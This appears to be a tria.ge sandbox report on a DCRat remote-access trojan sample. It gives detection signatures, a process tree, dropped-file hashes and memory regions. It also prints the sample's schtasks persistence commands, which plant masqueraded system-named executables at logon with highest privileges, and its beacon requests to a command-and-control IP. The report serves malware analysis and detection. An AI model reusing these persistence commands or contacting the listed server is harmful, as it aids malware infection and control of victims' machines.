Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/12/2024, 20:29 UTC

General

  • Target

    1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe

  • Size

    952KB

  • MD5

    95939c0925ece0edd3465ef067ca58c8

  • SHA1

    7c0f4691d4f60beb794a161834702623b610c2a6

  • SHA256

    1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d

  • SHA512

    b46684d36fc7be55fc83d84866fa91c8af85c19dc3f23922f6acf241e173dbfb173bda53d18bfc447f751315c004ea5dd06079a10d1a6acb70a354e98e5e9625

  • SSDEEP

    24576:u+O7F9smBDJwWmIezBLwsHuWbxR4AK5ZJXX:p8/KfRTK

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 6 IoCs
  • DCRat payload 7 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Drops file in System32 directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe
    "C:\Users\Admin\AppData\Local\Temp\1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe"
    1⤵
    • Modifies WinLogon for persistence
    • UAC bypass
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2388
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MhoiJDNFqU.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\system32\w32tm.exe
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3⤵
          PID:1516
        • C:\Windows\System32\wlangpui\lsm.exe
          "C:\Windows\System32\wlangpui\lsm.exe"
          3⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious use of AdjustPrivilegeToken
          • System policy modification
          PID:2216
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2752
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\Admin\wininit.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2928
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Documents and Settings\csrss.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2896
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\taskhost.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2768
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\System32\wlangpui\lsm.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2612
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\MdRes\dllhost.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2724

    Network

    • flag-ru
      GET
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      lsm.exe
      Remote address:
      37.230.117.59:80
      Request
      GET /imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9 HTTP/1.1
      Accept: */*
      Content-Type: text/javascript
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
      Host: 37.230.117.59
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 06 Dec 2024 20:29:55 GMT
      Server: Apache/2.4.25 (Debian)
      Content-Length: 275
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
    • flag-ru
      GET
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      lsm.exe
      Remote address:
      37.230.117.59:80
      Request
      GET /imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9 HTTP/1.1
      Accept: */*
      Content-Type: text/javascript
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
      Host: 37.230.117.59
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 06 Dec 2024 20:29:55 GMT
      Server: Apache/2.4.25 (Debian)
      Content-Length: 275
      Content-Type: text/html; charset=iso-8859-1
    • 37.230.117.59:80
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      http
      lsm.exe
      1.5kB
      1.1kB
      5
      4

      HTTP Request

      GET http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9

      HTTP Response

      404

      HTTP Request

      GET http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9

      HTTP Response

      404
    No results found

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe

      Filesize

      952KB

      MD5

      a0188adcd3266031be0b2fa14721ec68

      SHA1

      3a257a2045d863d5f8c736f21ecf639ea90149ed

      SHA256

      49b8b3f175660a091a5f34a036d6ff6f1ca1b64d80ff4874c7082624f46ec84b

      SHA512

      99782e3b7ec9a7ab4c58fa8d96ba70d161aa68e4fccea7d841f82404468d690834c70c386dd33069615b3618b825a502324436d792cbd9aa01522c6ae821d3cf

    • C:\Users\Admin\AppData\Local\Temp\MhoiJDNFqU.bat

      Filesize

      200B

      MD5

      c0691dff372da41143fec1f5953cb2a7

      SHA1

      05644947e1ac1597c9d59c444e8f3ea2cd19864e

      SHA256

      bf6a6ecbf6e51721f1331d7fd34f33805d8614792facae2f885954120da38231

      SHA512

      7521cb2e20bd6a5ac5a032b9520962dbc67796737d2a013f83e8de82e69030b454581c3f948afbcaacffa7550c0d44eefc6d66476abb414e1702c3a575091c8d

    • C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\taskhost.exe

      Filesize

      952KB

      MD5

      724676cd654194a3de063ea52502ef99

      SHA1

      c423b3bccf5568bade3180b2a869a2613ec4bad0

      SHA256

      2535e16dec497bcbd27100df14f9317fe149869ba8f5a334de4a75bad6c6c7f9

      SHA512

      c1e365a6ca98706cbcf8afe6c96530e5ad4de9c67bf7daf49363c506bdfda6a8096505d56286706c179bf8eaab747632857b1fa4ec41f52e7b86993d79b3bcd9

    • C:\Users\csrss.exe

      Filesize

      952KB

      MD5

      c99ee76eb8073aecb0d87b34ec7a40a1

      SHA1

      3bc291d384d0289253cdfc3c9ed73f9650220b3b

      SHA256

      0933c3afa33b1450228f34073b0afdef63be1cc1514c442737b1b9bd4851db93

      SHA512

      06833ed18d047c5363be1d196807f6c6bc80badb14967e0d8196c3ba21581a658bff9217e5daad38a92a6c71ab81bb39436433ae849c0b934b66c1c19e9533dc

    • C:\Windows\System32\wlangpui\lsm.exe

      Filesize

      952KB

      MD5

      95939c0925ece0edd3465ef067ca58c8

      SHA1

      7c0f4691d4f60beb794a161834702623b610c2a6

      SHA256

      1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d

      SHA512

      b46684d36fc7be55fc83d84866fa91c8af85c19dc3f23922f6acf241e173dbfb173bda53d18bfc447f751315c004ea5dd06079a10d1a6acb70a354e98e5e9625

    • C:\Windows\System32\wlangpui\lsm.exe

      Filesize

      952KB

      MD5

      0727fbe77deb1e4428a8ee05897264e6

      SHA1

      cff32a1a2a894d7bba710a17d4a1ed91ebf680e1

      SHA256

      320332087ffdf5ddbde31a961e2255e42940a6c1e6241508f75316b453d05cd6

      SHA512

      08785f08c9f6b907161609e550bc2b970fdffb6a0cbd3f91dfd7a57e8d6d86b49562eca648a4b9d424a9a14a7df8ce53d441949177a5ef14fe7d09df3ea6986a

    • memory/2216-105-0x00000000002F0000-0x00000000003E4000-memory.dmp

      Filesize

      976KB

    • memory/2388-6-0x0000000000150000-0x000000000015C000-memory.dmp

      Filesize

      48KB

    • memory/2388-10-0x0000000000500000-0x000000000050C000-memory.dmp

      Filesize

      48KB

    • memory/2388-9-0x00000000002F0000-0x00000000002FA000-memory.dmp

      Filesize

      40KB

    • memory/2388-11-0x00000000002C0000-0x00000000002CC000-memory.dmp

      Filesize

      48KB

    • memory/2388-8-0x0000000000180000-0x0000000000188000-memory.dmp

      Filesize

      32KB

    • memory/2388-4-0x0000000000160000-0x0000000000170000-memory.dmp

      Filesize

      64KB

    • memory/2388-5-0x0000000000190000-0x000000000019A000-memory.dmp

      Filesize

      40KB

    • memory/2388-0-0x000007FEF5063000-0x000007FEF5064000-memory.dmp

      Filesize

      4KB

    • memory/2388-7-0x0000000000170000-0x000000000017A000-memory.dmp

      Filesize

      40KB

    • memory/2388-3-0x0000000000140000-0x0000000000150000-memory.dmp

      Filesize

      64KB

    • memory/2388-2-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

      Filesize

      9.9MB

    • memory/2388-102-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

      Filesize

      9.9MB

    • memory/2388-1-0x0000000000300000-0x00000000003F4000-memory.dmp

      Filesize

      976KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.